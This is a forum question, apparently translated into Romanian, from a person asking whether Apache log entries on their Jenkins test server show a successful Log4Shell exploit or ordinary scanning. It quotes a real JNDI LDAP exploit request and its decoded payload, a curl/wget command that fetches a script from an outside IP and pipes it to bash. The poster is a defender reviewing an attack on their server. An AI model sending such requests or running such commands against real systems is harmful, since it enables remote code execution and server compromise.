exploatare log4j cu succes sau doar trafic normal

În primul rând, mulțumesc anticipat și scuze dacă întreb ceva cu adevărat prostesc, aceasta nu este expertiza mea :)

Am un server web doar pentru a-mi testa lucrurile. Săptămâna trecută am verificat dacă este vulnerabil la log4j CVE și se părea că doar Jenkins folosea o urmă de log4j, dar în interiorul slf4j (https://www.slf4j.org/log4shell.html) care nu pare a fi vulnerabil pe versiunea respectivă.

/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar

Am actualizat tot ce am putut doar pentru a fi în siguranță. L-am lăsat acolo, dar astăzi m-am încurcat cu jurnalele apache și am început să văd intrări de genul acesta:

195.54.160.149 - - [26/Dec/2021:10:43:35 +0100] „GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP 1,1" 200 90

Notă: Base64 editat odată decodat a fost ceva de genul:

(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|bash

Am rulat mai multe scripturi pentru a detecta dacă mai erau urme de log4j pe serverul meu, dar totul părea clar. Ar trebui să fiu îngrijorat că serverul răspunde cu un cod 200? Mulțumiri